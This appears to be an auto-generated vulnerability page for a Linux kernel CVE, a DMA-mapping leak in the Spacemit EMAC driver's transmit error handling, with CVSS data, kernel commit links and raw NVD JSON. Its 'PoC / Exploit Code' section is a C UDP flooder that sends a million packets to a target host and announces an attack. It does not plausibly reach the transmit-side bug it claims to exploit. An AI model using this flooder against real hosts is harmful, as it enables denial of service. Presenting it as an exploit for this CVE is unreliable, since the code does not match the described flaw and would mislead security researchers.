Security Vulnerability Report
CVE-2026-43462 CVSS 7.5 HIGH

Published: 2026-05-08 15:16:59
Last Modified: 2026-05-11 08:16:15
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

net: spacemit: Fix error handling in emac_tx_mem_map()

The DMA mappings were leaked on mapping error. Free them with the existing emac_free_tx_buf() function.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (Spacemit EMAC driver versions prior to fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

// Conceptual PoC for CVE-2026-43462
// This code attempts to trigger the DMA mapping leak in the Spacemit driver
// by sending a large volume of packets to the target.
int main() {
    int sock;
    struct sockaddr_in server;
    char buffer[1024];

    // Create a UDP socket
    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock == -1) {
        perror("Could not create socket");
        return 1;
    }

    server.sin_family = AF_INET;
    server.sin_port = htons(80); // Target port
    server.sin_addr.s_addr = inet_addr("TARGET_IP_ADDRESS");

    // Fill buffer with a fixed byte pattern
    memset(buffer, 'A', sizeof(buffer));

    printf("Starting attack to trigger DMA leak...\n");

    // Loop to send packets continuously
    // In a real scenario, specific packet sizes might be needed to trigger mapping failures
    for (int i = 0; i < 1000000; i++) {
        if (sendto(sock, buffer, sizeof(buffer), 0,
                   (struct sockaddr *)&server, sizeof(server)) < 0) {
            perror("Send failed");
        }
        // Small delay to allow processing and prevent immediate socket errors,
        // focusing on triggering the resource leak over time.
        usleep(100);
    }

    close(sock);
    return 0;
}

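References

https://git.kernel.org/stable/c/86292155bea578ebab0ca3b65d4d87ecd8a0e9ea
https://git.kernel.org/stable/c/c34ebd7b24ea70be3c6fdb6936f79f593f37df60
https://git.kernel.org/stable/c/edeaba385318f60ec1b32470da4d5eb800294d16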

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43462", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:59.080", "lastModified": "2026-05-11T08:16:15.363", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: spacemit: Fix error handling in emac_tx_mem_map()\n\nThe DMA mappings were leaked on mapping error. Free them with the\nexisting emac_free_tx_buf() function."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://git.kernel.org/stable/c/86292155bea578ebab0ca3b65d4d87ecd8a0e9ea", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c34ebd7b24ea70be3c6fdb6936f79f593f37df60", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/edeaba385318f60ec1b32470da4d5eb800294d16", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}